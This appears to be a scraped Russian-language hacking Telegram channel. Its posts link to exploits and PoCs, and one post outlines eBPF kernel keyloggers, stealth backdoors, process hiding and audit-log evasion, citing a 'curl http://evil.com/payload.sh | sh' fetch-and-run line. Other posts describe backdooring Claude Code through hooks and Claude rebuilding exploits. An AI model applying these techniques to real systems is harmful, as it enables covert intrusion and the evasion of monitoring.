Proxy Bar
21.2K subscribers
1.72K photos
104 videos
669 files
1.76K links
Exploits, Hacking and Leaks

Чат группы - https://xn--r1a.website/

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Redis Cluster Bus Full Takeover
*
Lab & PoC
👍12😱2
Stanford CS230 | Autumn 2025 | Lecture 8: Agents, Prompts, and RAG
*
Стэнфордский курс по созданию систем ИИ уделывает все туториалы Claude и треды по промптингу.
Реально учит инженеров создавать с нуля надёжные системы ИИ
https://www.youtube.com/watch?v=k1njvbBmfsw
👍11🔥9😱2
Рубрика На заметку $USERNAME@hacker.wtf - part 10
*

*
Хотя eBPF изначально это tracing (perf, bpftrace) / networking (XDP) / security (Cilium) для нас eBPF = возможность запускать свои грязные лапы по средствам программ прямо в kernel space .
Влияние на ядро без модулей !
Вся безопасность на eBPF verifier - он вроде как должен гарантировать что: нет выхода за границы, нет произвольной записи в память, нет kernel corruption и прочего непотребства.
verifier можно сломать !
verifier можно обойти !
*
CAP_BPF / CAP_SYS_ADMIN
Неочевидный кейс
### Если процесс имеет:
CAP_BPF
### или
CAP_SYS_ADMIN
##check
getcap -r / 2>/dev/null

То можно загружать eBPF программы, влиять на систему. И это не баг, а штатное поведение.
*
*
Кейлоггер в ядре
eBPF цепляется к:
sys_read
tty_read
input subsystem

И всё ! весь ввод теперь наш. нет процесса, нет бинаря, нет демона, все в kernel.
*
*
Invisible backdoor и network hook
eBPF можно повесить на socket или на tcp connect или XDP (уровень сетевухи), ииии если послать magic packet (например "0xproxybar") можно ыполнить действие (шелл отдать или payload запустить), порт не открыт, netstat ничего не показывает, firewall чист, а backdoor есть.
*
*
userspace rootkit без LKM
Концепт таков: перехватывает sys_getdents (это syscall который делает ls), если имя нашего процесса evil - не возвращаем его в список/
В итоге ps aux грустит, а evil живет свою жизнь.
*
*
Bypass audit / logging
Если запустить /tmp/evil.sh произойдет цепочка:
userspace > вызывает syscall (execve) > kernel обрабатывает syscall > auditd получает событие > поздравляю вы в танцах в логах
eBPF нужно вклинить между syscall и логированием, а именно через:
kprobe или tracepoint или LSM hooks.
Если eBPF висит на execve, можно фильтровать событий ДО логирования.
Или частая тема с сокрытием аргументов - запустили curl http://evil.com/payload.sh | sh а eBPF делает execve("/usr/bin/curl", "safe args")
Или что называется selective stealth, можно же не отключать всё, а только конкретные процессы \ команды \ UIDы:
если uid == 1000 > в логи
если uid == 1337 > в null

В Linux можно не маскировать действия, достаточно скрыть факт, что они вообще были.


#РубрикаНаЗаметкуХакеру
👍22🔥8😱3
👍17
VMkatz
*
Extract Windows credentials directly from VM memory snapshots and virtual disks
*
Get
👍20🔥13
II Всероссийский турнир по защите информации «GO CTF TATARSTAN»: регистрация открыта 🚩

В Казани снова соберутся те, кто умеет взламывать и защищать. Уже третий раз здесь встретятся сильнейшие по кибербезу среди молодых специалистов. Если давно смотришь на CTF и думаешь «хочу в дело» — самое время: турнир поможет проверить себя в бою, прокачать скиллы и заявить о себе как о будущем профи по кибербезопасности.

Заявки принимаются до 22 мая 12:00 в двух зачетах:
⏺️ Школьный, обучающиеся 7-11 классов
⏺️ Академический, студенты СПО до 23 лет

Призовой фонд турнира — 700 000 рублей 🔥


Основные этапы турнира:
🔹Регистрация команд — до 22 мая 12:00 по московскому времени
🔹Отборочный этап в формате онлайн - 23 мая с 10:00 до 18:00
🔹Финальный этап в Казани — 25 октября

Собирай команду, регистрируйся на сайте и готовься ворваться в отборы 23 мая в онлайн формате. Посмотрим, кто в этом году заберет статус сильнейшей команды по кибербезу среди молодежи. Удачи, она тебе пригодится 💬
👍9😱4
RedSun
*
windows PoC
👍18🔥9
CVE-2026-26980
*
Ghost CMS Content API SQL Injection

Lab + exploit
👍19🔥1
Reverse proxy для анонимизации Claude Code в взаимодействиях с пентестом.
Он находится между Claude Code и Anthropic API. Каждое сообщение, выход bash, чтение файла и результат grep анонимизируются перед выходом с машины. Ответы деанонимизируются до того, как Клод Код их видит. Клод никогда не трогает реальные клиентские данные.
*
LLM Anonymization
👍28🔥8😱4
protobuf.js - full remote code execution
*
CVSS - 9.4 (Critical)
PoC
👍16🔥7
👍12🔥7
Claude Code Backdoor
*
Бэкдоринг Код Клода с помощью хуков в settings.json

*
PoC
👍18🔥8😱5
linux-android
Хмммм 👍🏻
👍19🔥10
CEH v13 (AI Powered) Full Ethical Hacking Course (2026)
*
Link
👍13😱5🔥1
Linux System Call of the Day
*
Если достичь определенных ограничений ресурсов (например RLIMIT_NPROC) и программа не проверяет этот сбой, она тихо продолжит выполнение остального кода как root.
Hackers dream.
Man-страница прямо говорит: пропуск проверки return value — это большая ошибка безопасности.
Пример того как сервис дропает привилегии:
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <unistd.h>

int main() {
// Assume 33 is the UID/GID for www-data on Debian/Ubuntu
uid_t target_uid = 33;
gid_t target_gid = 33;

printf("Running setup as root...\n");

// Drop supplementary groups first, then GID, then UID.
// Order matters: once UID is non-root, you can't fix groups.
if (setgroups(0, NULL) == -1) {
perror("setgroups");
return 1;
}
if (setresgid(target_gid, target_gid, target_gid) == -1) {
perror("setresgid");
return 1;
}
if (setresuid(target_uid, target_uid, target_uid) == -1) {
perror("setresuid");
return 1;
}

printf("Privileges dropped successfully. Safe to handle requests!\n");

// Prove we can't go back to root (UID 0)
if (setresuid(0, 0, 0) == -1) {
printf("Confirmed: Cannot restore root privileges.\n");
}

return 0;
}
👍24🔥5
MAD Bugs: Feeding Claude Phrack Articles for Fun and Profit

Original text by Calif

The article describes an experiment in which Claude was given a Phrack write-up about chaining two rsync vulnerabilities into unauthenticated RCE, then asked to rebuild and adapt the exploit for a different target environment. Calif’s key point is not just that the model reproduced a working exploit, but that it handled…

https://core-jmp.org/2026/04/mad-bugs-feeding-claude-phrack-articles-for-fun-and-profit/
🔥8👍4
👍11🔥5😱1
WOW
Pack2TheRoot - CVE-2026-41651
*
Любой локальный непривилегированный пользователь может устанавливать произвольные пакеты от root без аутентификации.
протестировано на: Ubuntu/Debian/RockyLinux/Fedora
*
make Exploit
😱28👍13🔥1